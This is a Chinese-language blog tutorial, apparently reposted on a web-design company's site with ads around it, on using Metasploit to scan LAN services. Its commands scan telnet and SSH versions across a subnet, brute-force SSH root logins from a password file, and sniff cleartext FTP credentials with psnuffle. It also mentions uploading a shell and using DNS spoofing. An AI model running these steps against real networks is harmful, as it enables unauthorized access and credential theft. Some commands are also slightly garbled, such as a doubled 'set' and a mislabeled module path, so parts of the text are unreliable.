有的時候我們利用了Nmap發(fā)現(xiàn)了端口和服務器上的服務器，然而我們并不是專業(yè)的hack，很多時候或許我們只能破FTP 共享和telnet，雖然夠低端，但是如果你已經(jīng)在一個局域網(wǎng)中了，上面3個服務器必然會存在。

成都創(chuàng)新互聯(lián)公司是一家集網(wǎng)站建設,彭澤企業(yè)網(wǎng)站建設,彭澤品牌網(wǎng)站建設,網(wǎng)站定制,彭澤網(wǎng)站建設報價,網(wǎng)絡營銷,網(wǎng)絡優(yōu)化,彭澤網(wǎng)站推廣為一體的創(chuàng)新建站企業(yè)，幫助傳統(tǒng)企業(yè)提升企業(yè)形象加強企業(yè)競爭力?？沙浞譂M足這一群體相比中小企業(yè)更為豐富、高端、多元的互聯(lián)網(wǎng)需求。同時我們時刻保持專業(yè)、時尚、前沿，時刻以成就客戶成長自我，堅持不斷學習、思考、沉淀、凈化自己，讓我們?yōu)楦嗟钠髽I(yè)打造出實用型網(wǎng)站。

利用telnet來掃描

>search telnet_version  查找telnet掃描模塊

>use auxiliary/scanner/telnet/telnet_version  使用該模塊

>set RHOSTS 192.168.1.0/24 進行整個網(wǎng)段掃描

>set THREADS 100 設置線程，這個數(shù)值可以自己定義

>run

利用ssh來掃描

>search ssh_version  查找ssh掃描模塊

>use auxiliary/scanner/telnet/ssh_version  這個版本可能是其他的

>set RHOSTS 192.168.1.0/24 進行整個網(wǎng)段掃描

>set THREADS 100 設置線程，這個數(shù)值可以自己定義

>run

利用services來進行掃描的方法都是大同小異，如果想利用其他的services進行掃描，可以先

>search name_version 掃描出具體支持哪些服務，當然這是個積累的過程，常用的掃描還有oracle Mssql mysql等等，當然其實很多時候我們都是在抓瞎，Nmap足以解決問題了，更多的時候我們使用這個工具就是為了后面的猜解和監(jiān)聽做準備，下面就講解一些猜解方法。

SSH服務口令猜解

SSH服務器相當于windows下的FTP，我想多數(shù)管理員是不會配置密碼的，因為SSH可以通過公鑰配對加密和驗證的，而且很難猜解，當然也許有的管理員就設置了賬戶密碼，這樣的時候我們就可以利用下面的命令進行猜解了，當然你得有一張足夠大的彩虹表

>search ssh 如果熟練了可以直接敲路徑了，反正我是記不住，而且模塊眾多，短時間很難掌握全。

>use auxiliary/scanner/ssh/ssh_login 選擇ssh口令猜解模塊

>set RHOSTS 192.168.1.105 設置hosts

>set USERNAME root   設置用戶名為root

>set set PASS_FILE/root/password.txt 這個字典自己做啦，工具很多，好壞就在于字典了

>set THREADS 50 設置線程數(shù)，這個設置多了可能會死機，會拒絕服務，設置少了猜解會慢

>run

因為我不會拿自己的職業(yè)生涯開玩笑，所以我只在我自己搭建的環(huán)境下試驗過，所以效果如何不敢評價，總是不太好吧。

FTP嗅探工具psnuffle

這個工具是嗅探明文傳送的FTP的，所以所見即所得，內(nèi)網(wǎng)破解很實用，尤其是在win系統(tǒng)下，如果是利用IIS搭建的FTP服務，那么你嗅探到的賬戶肯定具有user權限，而后怎么提權就自己想去吧，如果利用FTP軟件，這個賬戶即使得到個人感覺用處也不大，除非可以獲得寫權限，這樣可以上傳shell.好吧，不多講了，看下psnuffle這個繞口的工具的使用方法：

>use auxiliary/sniffer/psnuffle

>run

當然你如果確定了端口也可以進行一些限制，使用set命令就好，這個嗅探可能需要開那么幾個小時，因為誰也不知道啥時候會有人登陸FTP，有的時候我在局域網(wǎng)了，我寧愿做DNS欺騙，感覺這樣更加簡單暴力，當然，也許直接就被防火墻抓了，呵呵

另外有需要云服務器可以了解下創(chuàng)新互聯(lián)scvps.cn，海內(nèi)外云服務器15元起步，三天無理由+7*72小時售后在線，公司持有idc許可證，提供“云服務器、裸金屬服務器、高防服務器、香港服務器、美國服務器、虛擬主機、免備案服務器”等云主機租用服務以及企業(yè)上云的綜合解決方案，具有“安全穩(wěn)定、簡單易用、服務可用性高、性價比高”等特點與優(yōu)勢，專為企業(yè)上云打造定制，能夠滿足用戶豐富、多元化的應用場景需求。

新聞標題：Metasploit學習三常見的服務掃描與口令猜解-創(chuàng)新互聯(lián)
文章路徑：http://www.rwnh.cn/article4/cejjoe.html

成都網(wǎng)站建設公司_創(chuàng)新互聯(lián)，為您提供Google、移動網(wǎng)站建設、外貿(mào)建站、企業(yè)網(wǎng)站制作、云服務器、網(wǎng)站改版

廣告

聲明：本網(wǎng)站發(fā)布的內(nèi)容（圖片、視頻和文字）以用戶投稿、用戶轉載內(nèi)容為主，如果涉及侵權請盡快告知，我們將會在第一時間刪除。文章觀點不代表本網(wǎng)站立場，如需處理請聯(lián)系客服。電話：028-86922220；郵箱：631063699@qq.com。內(nèi)容未經(jīng)允許不得轉載，或轉載時需注明來源： 創(chuàng)新互聯(lián)